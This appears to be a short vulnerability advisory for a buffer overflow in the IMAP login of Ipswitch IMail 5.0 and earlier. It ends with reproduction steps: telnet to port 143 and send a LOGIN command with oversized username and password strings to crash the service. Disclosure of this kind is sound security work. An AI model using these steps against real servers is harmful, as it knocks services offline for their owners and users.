[原文]Buffer overflow in the login functions in IMAP server (imapd) in Ipswitch IMail 5.0 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long user name or (2) a long password.
The imapd login process is susceptible to a buffer overflow attack which will crash the service.
Telnet to target machine, port 143
* OK IMAP4 Server (IMail 4.06)
X LOGIN glob1 glob2
Where glob1 is 1200 characters and glob2 is 1300 characters.